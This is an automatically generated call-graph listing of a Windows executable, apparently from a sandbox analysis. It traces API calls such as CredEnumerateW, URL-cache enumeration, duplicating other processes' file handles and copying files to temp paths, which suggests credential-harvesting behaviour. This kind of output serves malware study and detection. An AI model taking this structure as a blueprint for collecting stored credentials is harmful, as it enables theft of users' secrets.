39066 445c37 39063->39066 39064 445aa1 39067 445b17 39064->39067 39082 445ab2 memset 39064->39082 39095 409d1f 6 API calls 39064->39095 39391 40add4 39064->39391 39396 445389 39064->39396 39405 40ae51 39064->39405 39065 4456eb 39070 4456fd memset memset memset memset 39065->39070 39071 4457ea 39065->39071 39072 445389 258 API calls 39066->39072 39498 40aebe 39067->39498 39525 445093 23 API calls 39068->39525 39418 409c70 wcscpy wcsrchr 39070->39418 39421 413d29 39071->39421 39077 445c47 39072->39077 39078 445e33 39074->39078 39084 40b2cc 27 API calls 39077->39084 39085 409d1f 6 API calls 39078->39085 39080 445e7e 39081 445f67 39080->39081 39090 40b2cc 27 API calls 39081->39090 39086 40b2cc 27 API calls 39082->39086 39088 445c53 39084->39088 39089 445e47 39085->39089 39086->39064 39087 409c70 2 API calls 39091 44577e 39087->39091 39092 409d1f 6 API calls 39088->39092 39524 409b98 GetFileAttributesW 39089->39524 39094 445f73 39090->39094 39096 409c70 2 API calls 39091->39096 39097 445c67 39092->39097 39099 409d1f 6 API calls 39094->39099 39095->39064 39100 44578d 39096->39100 39101 445389 258 API calls 39097->39101 39098 445e56 39098->39068 39104 445e83 memset 39098->39104 39102 445f87 39099->39102 39100->39071 39107 40b2cc 27 API calls 39100->39107 39101->38964 39528 409b98 GetFileAttributesW 39102->39528 39106 40b2cc 27 API calls 39104->39106 39109 445eab 39106->39109 39110 4457a8 39107->39110 39108->38989 39108->39052 39111 409d1f 6 API calls 39109->39111 39112 409d1f 6 API calls 39110->39112 39113 445ebf 39111->39113 39114 4457b8 39112->39114 39115 40ae18 9 API calls 39113->39115 39420 409b98 GetFileAttributesW 39114->39420 39125 445ef5 39115->39125 39117 4457c7 39117->39071 39118 40ae51 9 API calls 39118->39125 39120 445f5c 39122 40aebe FindClose 39120->39122 39121 40add4 2 API calls 39121->39125 39122->39081 39123 40b2cc 27 API calls 39123->39125 39124 409d1f 6 API calls 39124->39125 39125->39118 39125->39120 39125->39121 39125->39123 39125->39124 39127 445f3a 39125->39127 39526 409b98 GetFileAttributesW 39125->39526 39527 445093 23 API calls 39127->39527 39129->38930 39130->38932 39131->38930 39132->38925 39134 40c775 39133->39134 39529 40b1ab ??3@YAXPAX ??3@YAXPAX 39134->39529 39136 40c788 39530 40b1ab ??3@YAXPAX ??3@YAXPAX 39136->39530 39138 40c790 39531 40b1ab ??3@YAXPAX ??3@YAXPAX 39138->39531 39140 40c798 39141 40aa04 ??3@YAXPAX 39140->39141 39142 40c7a0 39141->39142 39532 40c274 memset 39142->39532 39147 40a8ab 9 API calls 39148 40c7c3 39147->39148 39149 40a8ab 9 API calls 39148->39149 39150 40c7d0 39149->39150 39561 40c3c3 39150->39561 39154 40c7e5 39155 40c877 39154->39155 39156 40c86c 39154->39156 39162 40c634 49 API calls 39154->39162 39586 40a706 39154->39586 39163 40bdb0 39155->39163 39603 4053fe 39 API calls 39156->39603 39162->39154 39796 404363 39163->39796 39166 40bf5d 39816 40440c 39166->39816 39168 40bdee 39168->39166 39171 40b2cc 27 API calls 39168->39171 39169 40bddf CredEnumerateW 39169->39168 39172 40be02 wcslen 39171->39172 39172->39166 39174 40be1e 39172->39174 39174->39166 39183 4135f7 39217 40399d 39216->39217 39862 403a16 39217->39862 39219 403a09 39876 40b1ab ??3@YAXPAX ??3@YAXPAX 39219->39876 39221 403a12 wcsrchr 39221->38952 39222 4039a3 39222->39219 39225 4039f4 39222->39225 39873 40a02c CreateFileW 39222->39873 39225->39219 39226 4099c6 2 API calls 39225->39226 39226->39219 39228 414c2e 16 API calls 39227->39228 39229 404048 39228->39229 39230 414c2e 16 API calls 39229->39230 39231 404056 39230->39231 39232 409d1f 6 API calls 39231->39232 39233 404073 39232->39233 39234 409d1f 6 API calls 39233->39234 39235 40408e 39234->39235 39236 409d1f 6 API calls 39235->39236 39237 4040a6 39236->39237 39238 403af5 20 API calls 39237->39238 39239 4040ba 39238->39239 39240 403af5 20 API calls 39239->39240 39241 4040cb 39240->39241 39903 40414f memset 39241->39903 39243 404140 39917 40b1ab ??3@YAXPAX ??3@YAXPAX 39243->39917 39245 4040ec memset 39248 4040e0 39245->39248 39246 404148 39246->39009 39247 4099c6 2 API calls 39247->39248 39248->39243 39248->39245 39248->39247 39249 40a8ab 9 API calls 39248->39249 39249->39248 39930 40a6e6 WideCharToMultiByte 39250->39930 39252 4087ed 39931 4095d9 memset 39252->39931 39302 40b633 ??3@YAXPAX 39301->39302 39303 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39302->39303 39304 413f00 Process32NextW 39303->39304 39305 413da5 OpenProcess 39304->39305 39306 413f17 CloseHandle 39304->39306 39307 413df3 memset 39305->39307 39312 413eb0 39305->39312 39306->39047 40169 413f27 39307->40169 39309 413ebf ??3@YAXPAX 39309->39312 39310 4099f4 3 API calls 39310->39312 39312->39304 39312->39309 39312->39310 39313 413e37 GetModuleHandleW 39314 413e1f 39313->39314 39315 413e46 GetProcAddress 39313->39315 39314->39313 40174 413959 39314->40174 40190 413ca4 39314->40190 39315->39314 39317 413ea2 CloseHandle 39317->39312 39319 414c2e 16 API calls 39318->39319 39320 403eb7 39319->39320 39321 414c2e 16 API calls 39320->39321 39322 403ec5 39321->39322 39323 409d1f 6 API calls 39322->39323 39324 403ee2 39323->39324 39325 409d1f 6 API calls 39324->39325 39326 403efd 39325->39326 39327 409d1f 6 API calls 39326->39327 39328 403f15 39327->39328 39329 403af5 20 API calls 39328->39329 39330 403f29 39329->39330 39331 403af5 20 API calls 39330->39331 39332 403f3a 39331->39332 39333 40414f 33 API calls 39332->39333 39338 403f4f 39333->39338 39334 403faf 40204 40b1ab ??3@YAXPAX ??3@YAXPAX 39334->40204 39336 403f5b memset 39336->39338 39337 403fb7 39337->38993 39338->39334 39338->39336 39339 4099c6 2 API calls 39338->39339 39340 40a8ab 9 API calls 39338->39340 39339->39338 39340->39338 39342 414c2e 16 API calls 39341->39342 39343 403d26 39342->39343 39344 414c2e 16 API calls 39343->39344 39345 403d34 39344->39345 39346 409d1f 6 API calls 39345->39346 39347 403d51 39346->39347 39348 409d1f 6 API calls 39347->39348 39349 403d6c 39348->39349 39350 409d1f 6 API calls 39349->39350 39351 403d84 39350->39351 39352 403af5 20 API calls 39351->39352 39353 403d98 39352->39353 39354 403af5 20 API calls 39353->39354 39355 403da9 39354->39355 39356 40414f 33 API calls 39355->39356 39357 403dbe 39356->39357 39358 403e1e 39357->39358 39359 403dca memset 39357->39359 39362 4099c6 2 API calls 39357->39362 39363 40a8ab 9 API calls 39357->39363 40205 40b1ab ??3@YAXPAX ??3@YAXPAX 39358->40205 39359->39357 39361 403e26 39361->38997 39362->39357 39363->39357 39365 414b81 9 API calls 39364->39365 39366 414c40 39365->39366 39367 414c73 memset 39366->39367 40206 409cea 39366->40206 39368 414c94 39367->39368 40209 414592 RegOpenKeyExW 39368->40209 39371 414c64 39371->38987 39373 414cc1 39374 414cf4 wcscpy 39373->39374 40210 414bb0 wcscpy 39373->40210 39374->39371 39376 414cd2 40211 4145ac RegQueryValueExW 39376->40211 39378 414ce9 RegCloseKey 39378->39374 39380 409d62 39379->39380 39381 409d43 wcscpy 39379->39381 39380->39029 39382 409719 2 API calls 39381->39382 39383 409d51 wcscat 39382->39383 39383->39380 39385 40aebe FindClose 39384->39385 39386 40ae21 39385->39386 39387 4099c6 2 API calls 39386->39387 39388 40ae35 39387->39388 39389 409d1f 6 API calls 39388->39389 39390 40ae49 39389->39390 39390->39064 39392 40ade0 39391->39392 39393 40ae0f 39391->39393 39392->39393 39394 40ade7 wcscmp 39392->39394 39393->39064 39394->39393 39395 40adfe wcscmp 39394->39395 39395->39393 39397 40ae18 9 API calls 39396->39397 39399 4453c4 39397->39399 39398 40ae51 9 API calls 39398->39399 39399->39398 39400 4453f3 39399->39400 39401 40add4 2 API calls 39399->39401 39404 445403 253 API calls 39399->39404 39402 40aebe FindClose 39400->39402 39401->39399 39403 4453fe 39402->39403 39403->39064 39404->39399 39406 40ae7b FindNextFileW 39405->39406 39407 40ae5c FindFirstFileW 39405->39407 39408 40ae94 39406->39408 39409 40ae8f 39406->39409 39407->39408 39411 409d1f 6 API calls 39408->39411 39412 40aeb6 39408->39412 39410 40aebe FindClose 39409->39410 39410->39408 39411->39412 39412->39064 39414->39050 39415->39031 39416->39031 39417->39065 39419 409c89 39418->39419 39419->39087 39420->39117 39422 413d39 39421->39422 39423 413d2f FreeLibrary 39421->39423 39424 40b633 ??3@YAXPAX 39422->39424 39423->39422 39425 413d42 39424->39425 39426 40b633 ??3@YAXPAX 39425->39426 39427 413d4a 39426->39427 39427->38946 39428->38949 39429->38999 39430->39013 39432 44db70 39431->39432 39433 40b6fc memset 39432->39433 39434 409c70 2 API calls 39433->39434 39435 40b732 wcsrchr 39434->39435 39436 40b743 39435->39436 39437 40b746 memset 39435->39437 39436->39437 39438 40b2cc 27 API calls 39437->39438 39439 40b76f 39438->39439 39440 409d1f 6 API calls 39439->39440 39441 40b783 39440->39441 40212 409b98 GetFileAttributesW 39441->40212 39443 40b792 39444 40b7c2 39443->39444 39445 409c70 2 API calls 39443->39445 40213 40bb98 39444->40213 39447 40b7a5 39445->39447 39449 40b2cc 27 API calls 39447->39449 39453 40b7b2 39449->39453 39450 40b837 FindCloseChangeNotification 39452 40b83e memset 39450->39452 39451 40b817 40247 409a45 GetTempPathW 39451->40247 40246 40a6e6 WideCharToMultiByte 39452->40246 39456 409d1f 6 API calls 39453->39456 39456->39444 39457 40b827 CopyFileW 39457->39452 39458 40b866 39459 444432 121 API calls 39458->39459 39460 40b879 39459->39460 39461 40bad5 39460->39461 39462 40b273 27 API calls 39460->39462 39463 40baeb 39461->39463 39464 40bade DeleteFileW 39461->39464 39465 40b89a 39462->39465 39466 40b04b ??3@YAXPAX 39463->39466 39464->39463 39467 438552 134 API calls 39465->39467 39468 40baf3 39466->39468 39469 40b8a4 39467->39469 39468->39023 39470 40bacd 39469->39470 39472 4251c4 137 API calls 39469->39472 39471 443d90 111 API calls 39470->39471 39471->39461 39495 40b8b8 39472->39495 39473 40bac6 40259 424f26 123 API calls 39473->40259 39474 40b8bd memset 40250 425413 17 API calls 39474->40250 39477 425413 17 API calls 39477->39495 39480 40a71b MultiByteToWideChar 39480->39495 39481 40a734 MultiByteToWideChar 39481->39495 39484 40b9b5 memcmp 39484->39495 39485 4099c6 2 API calls 39485->39495 39486 404423 37 API calls 39486->39495 39488 40bb3e memset memcpy 40260 40a734 MultiByteToWideChar 39488->40260 39489 4251c4 137 API calls 39489->39495 39492 40bb88 LocalFree 39492->39495 39495->39473 39495->39474 39495->39477 39495->39480 39495->39481 39495->39484 39495->39485 39495->39486 39495->39488 39495->39489 39496 40ba5f memcmp 39495->39496 40251 4253ef 16 API calls 39495->40251 40252 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39495->40252 40253 4253af 17 API calls 39495->40253 40254 4253cf 17 API calls 39495->40254 40255 447280 memset 39495->40255 40256 447960 memset memcpy memcpy memcpy 39495->40256 40257 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39495->40257 40258 447920 memcpy memcpy memcpy 39495->40258 39496->39495 39497->39025 39499 40aed1 39498->39499 39500 40aec7 FindClose 39498->39500 39499->38958 39500->39499 39502 4099d7 39501->39502 39503 4099da memcpy 39501->39503 39502->39503 39503->39008 39505 40b2cc 27 API calls 39504->39505 39506 44543f 39505->39506 39507 409d1f 6 API calls 39506->39507 39508 44544f 39507->39508 40349 409b98 GetFileAttributesW 39508->40349 39510 44545e 39511 445476 39510->39511 39512 40b6ef 252 API calls 39510->39512 39513 40b2cc 27 API calls 39511->39513 39512->39511 39514 445482 39513->39514 39515 409d1f 6 API calls 39514->39515 39516 445492 39515->39516 40350 409b98 GetFileAttributesW 39516->40350 39518 4454a1 39519 4454b9 39518->39519 39520 40b6ef 252 API calls 39518->39520 39519->39039 39520->39519 39521->39038 39522->39055 39523->39061 39524->39098 39525->39080 39526->39125 39527->39125 39528->39108 39529->39136 39530->39138 39531->39140 39533 414c2e 16 API calls 39532->39533 39534 40c2ae 39533->39534 39604 40c1d3 39534->39604 39539 40c3be 39556 40a8ab 39539->39556 39540 40afcf 2 API calls 39541 40c2fd FindFirstUrlCacheEntryW 39540->39541 39542 40c3b6 39541->39542 39543 40c31e wcschr 39541->39543 39544 40b04b ??3@YAXPAX 39542->39544 39545 40c331 39543->39545 39546 40c35e FindNextUrlCacheEntryW 39543->39546 39544->39539 39547 40a8ab 9 API calls 39545->39547 39546->39543 39548 40c373 GetLastError 39546->39548 39551 40c33e wcschr 39547->39551 39549 40c3ad FindCloseUrlCache 39548->39549 39550 40c37e 39548->39550 39549->39542 39552 40afcf 2 API calls 39550->39552 39551->39546 39553 40c34f 39551->39553 39554 40c391 FindNextUrlCacheEntryW 39552->39554 39555 40a8ab 9 API calls 39553->39555 39554->39543 39554->39549 39555->39546 39720 40a97a 39556->39720 39559 40a8cc 39559->39147 39726 40b1ab ??3@YAXPAX ??3@YAXPAX 39561->39726 39563 40c3dd 39564 40b2cc 27 API calls 39563->39564 39565 40c3e7 39564->39565 39727 414592 RegOpenKeyExW 39565->39727 39567 40c3f4 39568 40c50e 39567->39568 39569 40c3ff 39567->39569 39583 405337 39568->39583 39570 40a9ce 4 API calls 39569->39570 39571 40c418 memset 39570->39571 39728 40aa1d 39571->39728 39574 40c471 39576 40c47a _wcsupr 39574->39576 39575 40c505 RegCloseKey 39575->39568 39730 40a8d0 7 API calls 39576->39730 39578 40c498 39731 40a8d0 7 API calls 39578->39731 39580 40c4ac memset 39581 40aa1d 39580->39581 39582 40c4e4 RegEnumValueW 39581->39582 39582->39575 39582->39576 39732 405220 39583->39732 39587 4099c6 2 API calls 39586->39587 39588 40a714 _wcslwr 39587->39588 39589 40c634 39588->39589 39789 405361 39589->39789 39592 40c65c wcslen 39792 4053b6 39 API calls 39592->39792 39593 40c71d wcslen 39593->39154 39595 40c677 39596 40c713 39595->39596 39793 40538b 39 API calls 39595->39793 39795 4053df 39 API calls 39596->39795 39599 40c6a5 39599->39596 39603->39155 39605 40ae18 9 API calls 39604->39605 39611 40c210 39605->39611 39606 40ae51 9 API calls 39606->39611 39607 40c264 39608 40aebe FindClose 39607->39608 39610 40c26f 39608->39610 39609 40add4 2 API calls 39609->39611 39616 40e5ed memset memset 39610->39616 39611->39606 39611->39607 39611->39609 39612 40c231 _wcsicmp 39611->39612 39613 40c1d3 35 API calls 39611->39613 39612->39611 39614 40c248 39612->39614 39613->39611 39629 40c084 22 API calls 39614->39629 39617 414c2e 16 API calls 39616->39617 39618 40e63f 39617->39618 39619 409d1f 6 API calls 39618->39619 39620 40e658 39619->39620 39630 409b98 GetFileAttributesW 39620->39630 39622 40e667 39624 409d1f 6 API calls 39622->39624 39625 40e680 39622->39625 39624->39625 39631 409b98 GetFileAttributesW 39625->39631 39626 40e68f 39627 40c2d8 39626->39627 39632 40e4b2 39626->39632 39627->39539 39627->39540 39629->39611 39630->39622 39631->39626 39653 40e01e 39632->39653 39634 40e593 39635 40e5b0 39634->39635 39636 40e59c DeleteFileW 39634->39636 39637 40b04b ??3@YAXPAX 39635->39637 39636->39635 39639 40e5bb 39637->39639 39638 40e521 39638->39634 39676 40e175 39638->39676 39641 40e5c4 CloseHandle 39639->39641 39642 40e5cc 39639->39642 39641->39642 39644 40b633 ??3@YAXPAX 39642->39644 39643 40e573 39645 40e584 39643->39645 39646 40e57c FindCloseChangeNotification 39643->39646 39647 40e5db 39644->39647 39719 40b1ab ??3@YAXPAX ??3@YAXPAX 39645->39719 39646->39645 39650 40b633 ??3@YAXPAX 39647->39650 39649 40e540 39649->39643 39696 40e2ab 39649->39696 39651 40e5e3 39650->39651 39651->39627 39654 406214 22 API calls 39653->39654 39655 40e03c 39654->39655 39656 40e16b 39655->39656 39657 40dd85 74 API calls 39655->39657 39656->39638 39658 40e06b 39657->39658 39658->39656 39659 40afcf ??2@YAPAXI ??3@YAXPAX 39658->39659 39660 40e08d OpenProcess 39659->39660 39661 40e0a4 GetCurrentProcess DuplicateHandle 39660->39661 39665 40e152 39660->39665 39662 40e0d0 GetFileSize 39661->39662 39663 40e14a CloseHandle 39661->39663 39666 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39662->39666 39663->39665 39664 40e160 39668 40b04b ??3@YAXPAX 39664->39668 39665->39664 39667 406214 22 API calls 39665->39667 39669 40e0ea 39666->39669 39667->39664 39668->39656 39670 4096dc CreateFileW 39669->39670 39671 40e0f1 CreateFileMappingW 39670->39671 39672 40e140 CloseHandle CloseHandle 39671->39672 39673 40e10b MapViewOfFile 39671->39673 39672->39663 39674 40e13b FindCloseChangeNotification 39673->39674 39675 40e11f WriteFile UnmapViewOfFile 39673->39675 39674->39672 39675->39674 39677 40e18c 39676->39677 39678 406b90 11 API calls 39677->39678 39679 40e19f 39678->39679 39680 40e1a7 memset 39679->39680 39681 40e299 39679->39681 39686 40e1e8 39680->39686 39682 4069a3 ??3@YAXPAX ??3@YAXPAX 39681->39682 39683 40e2a4 39682->39683 39683->39649 39684 406e8f 13 API calls 39684->39686 39685 406b53 SetFilePointerEx ReadFile 39685->39686 39686->39684 39686->39685 39687 40e283 39686->39687 39688 40dd50 _wcsicmp 39686->39688 39692 40742e 8 API calls 39686->39692 39693 40aae3 wcslen wcslen _memicmp 39686->39693 39694 40e244 _snwprintf 39686->39694 39689 40e291 39687->39689 39690 40e288 ??3@YAXPAX 39687->39690 39688->39686 39691 40aa04 ??3@YAXPAX 39689->39691 39690->39689 39691->39681 39692->39686 39693->39686 39695 40a8d0 7 API calls 39694->39695 39695->39686 39697 40e2c2 39696->39697 39698 406b90 11 API calls 39697->39698 39709 40e2d3 39698->39709 39699 40e4a0 39700 4069a3 ??3@YAXPAX ??3@YAXPAX 39699->39700 39702 40e4ab 39700->39702 39701 406e8f 13 API calls 39701->39709 39702->39649 39703 406b53 SetFilePointerEx ReadFile 39703->39709 39704 40e489 39705 40aa04 ??3@YAXPAX 39704->39705 39707 40e491 39705->39707 39706 40dd50 _wcsicmp 39706->39709 39707->39699 39708 40e497 ??3@YAXPAX 39707->39708 39708->39699 39709->39699 39709->39701 39709->39703 39709->39704 39709->39706 39710 40dd50 _wcsicmp 39709->39710 39713 40742e 8 API calls 39709->39713 39714 40e3e0 memcpy 39709->39714 39715 40e3b3 wcschr 39709->39715 39716 40e3fb memcpy 39709->39716 39717 40e416 memcpy 39709->39717 39718 40e431 memcpy 39709->39718 39711 40e376 memset 39710->39711 39712 40aa29 6 API calls 39711->39712 39712->39709 39713->39709 39714->39709 39715->39709 39716->39709 39717->39709 39718->39709 39719->39634 39722 40a980 39720->39722 39721 40a8bb 39721->39559 39725 40a8d0 7 API calls 39721->39725 39722->39721 39723 40a995 _wcsicmp 39722->39723 39724 40a99c wcscmp 39722->39724 39723->39722 39724->39722 39725->39559 39726->39563 39727->39567 39729 40aa23 RegEnumValueW 39728->39729 39729->39574 39729->39575 39730->39578 39731->39580 39733 405335 39732->39733 39734 40522a 39732->39734 39733->39154 39735 40b2cc 27 API calls 39734->39735 39736 405234 39735->39736 39737 40a804 8 API calls 39736->39737 39738 40523a 39737->39738 39777 40b273 39738->39777 39740 405248 _mbscpy _mbscat GetProcAddress 39741 40b273 27 API calls 39740->39741 39742 405279 39741->39742 39780 405211 GetProcAddress 39742->39780 39744 405282 39745 40b273 27 API calls 39744->39745 39778 40b58d 27 API calls 39777->39778 39779 40b18c 39778->39779 39779->39740 39780->39744 39790 405220 39 API calls 39789->39790 39791 405369 39790->39791 39791->39592 39791->39593 39792->39595 39793->39599 39795->39593 39797 40440c FreeLibrary 39796->39797 39798 40436d 39797->39798 39799 40a804 8 API calls 39798->39799 39800 404377 39799->39800 39801 404383 39800->39801 39802 404405 39800->39802 39803 40b273 27 API calls 39801->39803 39802->39166 39802->39168 39802->39169 39804 40438d GetProcAddress 39803->39804 39805 40b273 27 API calls 39804->39805 39817 404413 FreeLibrary 39816->39817 39818 40441e 39816->39818 39817->39818 39818->39183 39863 403a29 39862->39863 39877 403bed memset memset 39863->39877 39865 403ae7 39890 40b1ab ??3@YAXPAX ??3@YAXPAX 39865->39890 39866 403a3f memset 39872 403a2f 39866->39872 39868 403aef 39868->39222 39869 409d1f 6 API calls 39869->39872 39870 409b98 GetFileAttributesW 39870->39872 39871 40a8d0 7 API calls 39871->39872 39872->39865 39872->39866 39872->39869 39872->39870 39872->39871 39874 40a051 GetFileTime FindCloseChangeNotification 39873->39874 39875 4039ca CompareFileTime 39873->39875 39874->39875 39875->39222 39876->39221 39878 414c2e 16 API calls 39877->39878 39879 403c38 39878->39879 39880 409719 2 API calls 39879->39880 39881 403c3f wcscat 39880->39881 39882 414c2e 16 API calls 39881->39882 39883 403c61 39882->39883 39884 409719 2 API calls 39883->39884 39885 403c68 wcscat 39884->39885 39891 403af5 39885->39891 39888 403af5 20 API calls 39889 403c95 39888->39889 39889->39872 39890->39868 39892 403b02 39891->39892 39893 40ae18 9 API calls 39892->39893 39900 403b37 39893->39900 39894 40ae51 9 API calls 39894->39900 39895 403bdb 39897 40aebe FindClose 39895->39897 39896 40add4 wcscmp wcscmp 39896->39900 39898 403be6 39897->39898 39898->39888 39899 40ae18 9 API calls 39899->39900 39900->39894 39900->39895 39900->39896 39900->39899 39901 40aebe FindClose 39900->39901 39902 40a8d0 7 API calls 39900->39902 39901->39900 39902->39900 39904 409d1f 6 API calls 39903->39904 39905 404190 39904->39905 39918 409b98 GetFileAttributesW 39905->39918 39907 40419c 39908 4041a7 6 API calls 39907->39908 39909 40435c 39907->39909 39910 40424f 39908->39910 39909->39248 39910->39909 39912 40425e memset 39910->39912 39914 409d1f 6 API calls 39910->39914 39915 40a8ab 9 API calls 39910->39915 39919 414842 39910->39919 39912->39910 39913 404296 wcscpy 39912->39913 39913->39910 39914->39910 39916 4042b6 memset memset _snwprintf wcscpy 39915->39916 39916->39910 39917->39246 39918->39907 39922 41443e 39919->39922 39921 414866 39921->39910 39923 41444b 39922->39923 39924 414451 39923->39924 39925 4144a3 GetPrivateProfileStringW 39923->39925 39926 414491 39924->39926 39927 414455 wcschr 39924->39927 39925->39921 39928 414495 WritePrivateProfileStringW 39926->39928 39927->39926 39929 414463 _snwprintf 39927->39929 39928->39921 39929->39928 39930->39252 40196 413f4f 40169->40196 40172 413f37 K32GetModuleFileNameExW 40173 413f4a 40172->40173 40173->39314 40175 413969 wcscpy 40174->40175 40176 41396c wcschr 40174->40176 40188 413a3a 40175->40188 40176->40175 40178 41398e 40176->40178 40201 4097f7 wcslen wcslen _memicmp 40178->40201 40180 41399a 40181 4139a4 memset 40180->40181 40182 4139e6 40180->40182 40202 409dd5 GetWindowsDirectoryW wcscpy 40181->40202 40184 413a31 wcscpy 40182->40184 40185 4139ec memset 40182->40185 40184->40188 40203 409dd5 GetWindowsDirectoryW wcscpy 40185->40203 40186 4139c9 wcscpy wcscat 40186->40188 40188->39314 40189 413a11 memcpy wcscat 40189->40188 40191 413cb0 GetModuleHandleW 40190->40191 40192 413cda 40190->40192 40191->40192 40193 413cbf GetProcAddress 40191->40193 40194 413ce3 GetProcessTimes 40192->40194 40195 413cf6 40192->40195 40193->40192 40194->39317 40195->39317 40197 413f2f 40196->40197 40198 413f54 40196->40198 40197->40172 40197->40173 40199 40a804 8 API calls 40198->40199 40200 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40199->40200 40200->40197 40201->40180 40202->40186 40203->40189 40204->39337 40205->39361 40207 409cf9 GetVersionExW 40206->40207 40208 409d0a 40206->40208 40207->40208 40208->39367 40208->39371 40209->39373 40210->39376 40211->39378 40212->39443 40214 40bba5 40213->40214 40261 40cc26 40214->40261 40217 40bd4b 40282 40cc0c 40217->40282 40222 40b2cc 27 API calls 40223 40bbef 40222->40223 40289 40ccf0 _wcsicmp 40223->40289 40225 40bbf5 40225->40217 40290 40ccb4 6 API calls 40225->40290 40227 40bc26 40228 40cf04 17 API calls 40227->40228 40229 40bc2e 40228->40229 40230 40bd43 40229->40230 40231 40b2cc 27 API calls 40229->40231 40232 40cc0c 4 API calls 40230->40232 40233 40bc40 40231->40233 40232->40217 40291 40ccf0 _wcsicmp 40233->40291 40235 40bc46 40235->40230 40236 40bc61 memset memset WideCharToMultiByte 40235->40236 40292 40103c strlen 40236->40292 40238 40bcc0 40239 40b273 27 API calls 40238->40239 40240 40bcd0 memcmp 40239->40240 40240->40230 40241 40bce2 40240->40241 40242 404423 37 API calls 40241->40242 40243 40bd10 40242->40243 40243->40230 40244 40bd3a LocalFree 40243->40244 40245 40bd1f memcpy 40243->40245 40244->40230 40245->40244 40246->39458 40248 409a74 GetTempFileNameW 40247->40248 40249 409a66 GetWindowsDirectoryW 40247->40249 40248->39457 40249->40248 40250->39495 40251->39495 40252->39495 40253->39495 40254->39495 40255->39495 40256->39495 40257->39495 40258->39495 40259->39470 40260->39492 40293 4096c3 CreateFileW 40261->40293 40263 40cc34 40264 40cc3d GetFileSize 40263->40264 40272 40bbca 40263->40272 40265 40afcf 2 API calls 40264->40265 40266 40cc64 40265->40266 40294 40a2ef ReadFile 40266->40294 40268 40cc71 40295 40ab4a MultiByteToWideChar 40268->40295 40270 40cc95 FindCloseChangeNotification 40271 40b04b ??3@YAXPAX 40270->40271 40271->40272 40272->40217 40273 40cf04 40272->40273 40274 40b633 ??3@YAXPAX 40273->40274 40275 40cf14 40274->40275 40301 40b1ab ??3@YAXPAX ??3@YAXPAX 40275->40301 40277 40bbdd 40277->40217 40277->40222 40278 40cf1b 40278->40277 40280 40cfef 40278->40280 40302 40cd4b 40278->40302 40281 40cd4b 14 API calls 40280->40281 40281->40277 40283 40b633 ??3@YAXPAX 40282->40283 40284 40cc15 40283->40284 40285 40aa04 ??3@YAXPAX 40284->40285 40286 40cc1d 40285->40286 40348 40b1ab ??3@YAXPAX ??3@YAXPAX 40286->40348 40288 40b7d4 memset CreateFileW 40288->39450 40288->39451 40289->40225 40290->40227 40291->40235 40292->40238 40293->40263 40294->40268 40296 40ab6b 40295->40296 40300 40ab93 40295->40300 40297 40a9ce 4 API calls 40296->40297 40298 40ab74 40297->40298 40299 40ab7c MultiByteToWideChar 40298->40299 40299->40300 40300->40270 40301->40278 40303 40cd7b 40302->40303 40336 40aa29 6 API calls 40303->40336 40305 40cef5 40306 40aa04 ??3@YAXPAX 40305->40306 40307 40cefd 40306->40307 40307->40278 40308 40cd89 40308->40305 40337 40aa29 6 API calls 40308->40337 40310 40ce1d 40338 40aa29 6 API calls 40310->40338 40312 40ce3e 40313 40ce6a 40312->40313 40339 40abb7 wcslen memmove 40312->40339 40314 40ce9f 40313->40314 40342 40abb7 wcslen memmove 40313->40342 40345 40a8d0 7 API calls 40314->40345 40317 40ce56 40340 40aa71 wcslen 40317->40340 40319 40ceb5 40346 40a8d0 7 API calls 40319->40346 40321 40ce8b 40343 40aa71 wcslen 40321->40343 40323 40ce5e 40341 40abb7 wcslen memmove 40323->40341 40324 40ce93 40344 40abb7 wcslen memmove 40324->40344 40328 40cecb 40347 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40328->40347 40330 40cedd 40331 40aa04 ??3@YAXPAX 40330->40331 40332 40cee5 40331->40332 40333 40aa04 ??3@YAXPAX 40332->40333 40334 40ceed 40333->40334 40335 40aa04 ??3@YAXPAX 40334->40335 40335->40305 40336->40308 40337->40310 40338->40312 40339->40317 40340->40323 40341->40313 40342->40321 40343->40324 40344->40314 40345->40319 40346->40328 40347->40330 40348->40288 40349->39510 40350->39518 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 37850 4426a9 37855 4324d3 37850->37855 37852 4426d2 37869 431a7b 37852->37869 37854 4426e3 37856 4324e3 37855->37856 37857 4324da 37855->37857 37861 4324e8 37856->37861 37941 43240a 12 API calls 37856->37941 37937 415a91 37857->37937 37860 4324fd 37862 432513 37860->37862 37863 432508 37860->37863 37861->37852 37943 43034a memcpy 37862->37943 37942 4325ad memset 37863->37942 37865 43250e 37865->37852 37867 432548 37944 43034a memcpy 37867->37944 37870 431aa3 37869->37870 37926 431b2e 37869->37926 37870->37926 37945 43817e 37870->37945 37873 432116 37979 4325ad memset 37873->37979 37876 432122 37876->37854 37878 431ad5 37879 431b04 37878->37879 37878->37926 37950 42faf4 12 API calls 37878->37950 37951 42ff8c 37879->37951 37880 431b15 37881 431baa 37880->37881 37882 431b7c memcmp 37880->37882 37880->37926 37885 431bb0 37881->37885 37886 431bcb 37881->37886 37882->37881 37901 431b95 37882->37901 37960 4169a7 11 API calls 37885->37960 37889 431bd1 37886->37889 37890 431c45 37886->37890 37961 43034a memcpy 37889->37961 37963 4165ff 37890->37963 37892 431bdc 37892->37926 37962 430468 11 API calls 37892->37962 37895 431c65 37896 431cba 37895->37896 37895->37926 37966 42bf4c 14 API calls 37895->37966 37899 415a91 memset 37896->37899 37898 431bef 37898->37895 37898->37901 37898->37926 37902 431d17 37899->37902 37900 431ca1 37900->37926 37967 42bfcf memcpy 37900->37967 37901->37926 37959 4169a7 11 API calls 37901->37959 37903 431d27 memcpy 37902->37903 37902->37926 37911 431da8 37903->37911 37918 431e97 37903->37918 37905 431eb8 37969 4169a7 11 API calls 37905->37969 37906 431f3c 37908 431fc3 37906->37908 37909 431f45 37906->37909 37972 4397fd memset 37908->37972 37970 4172c8 memset 37909->37970 37911->37905 37913 431e12 memcpy 37911->37913 37911->37918 37911->37926 37968 430af5 16 API calls 37911->37968 37912 431fd4 37912->37926 37973 4328e4 12 API calls 37912->37973 37913->37911 37917 431feb 37974 4233ae 11 API calls 37917->37974 37918->37906 37921 431f6a 37918->37921 37920 431ffc 37922 43202e 37920->37922 37925 4165ff 11 API calls 